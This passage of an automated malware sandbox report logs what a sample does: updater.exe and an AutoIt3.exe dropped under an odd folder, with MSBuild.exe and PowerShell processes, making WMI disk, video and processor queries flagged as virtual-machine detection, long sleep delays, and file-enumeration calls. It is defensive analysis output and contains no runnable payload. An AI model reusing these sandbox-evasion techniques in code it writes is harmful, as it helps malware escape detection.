                    Source: C:\faggbgb\AutoIt3.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 11E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2E70000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C70000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1780000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 31A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F50000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: D40000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2750000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2690000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5548Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4144Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5141Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4574Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4837
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeAPI coverage: 5.8 %
                    Source: C:\faggbgb\AutoIt3.exeAPI coverage: 5.8 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 5141 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 4574 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -360000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -30692s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -54471s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -43921s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -35162s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -50171s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -32208s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -59000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -53974s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -58891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -50022s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -58781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -57186s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976Thread sleep time: -58670s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -40910s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -31910s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -41691s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -50346s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -37549s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -31155s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -45286s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -42614s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -37854s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -59864s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -52502s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -45406s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -57596s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -47070s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -48095s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2716Thread sleep time: -480000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -38277s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -47898s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -48758s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -48016s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -54262s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -39165s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -49810s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7164Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -41851s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -48637s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -35260s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -34191s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652Thread sleep time: -51059s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7176Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2220Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\faggbgb\AutoIt3.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\faggbgb\AutoIt3.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01024005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_01024005
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0102C2FF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102494A GetFileAttributesW,FindFirstFileW,FindClose,14_2_0102494A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102CD14 FindFirstFileW,FindClose,14_2_0102CD14
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,14_2_0102CD9F
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0102F5D8
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0102F735
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0102FA36
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01023CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_01023CE2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015F53CD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,14_2_015F53CD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015F54D5 FindFirstFileA,GetLastError,14_2_015F54D5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015F2CFD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_015F2CFD
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00A04005
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00A0C2FF
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0494A GetFileAttributesW,FindFirstFileW,FindClose,16_2_00A0494A
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_00A0CD9F
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0CD14 FindFirstFileW,FindClose,16_2_00A0CD14
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00A0F5D8
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00A0F735
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00A0FA36
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00A03CE2
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_01093125 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,16_2_01093125
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_0109322D FindFirstFileA,GetLastError,16_2_0109322D
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_01090A55 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_01090A55
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FD5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,14_2_00FD5D13
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30692
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54471
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43921
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35162
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53974
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50022
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57186
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41691
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50346
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37549
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45286
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42614
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37854
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59864
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52502
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45406
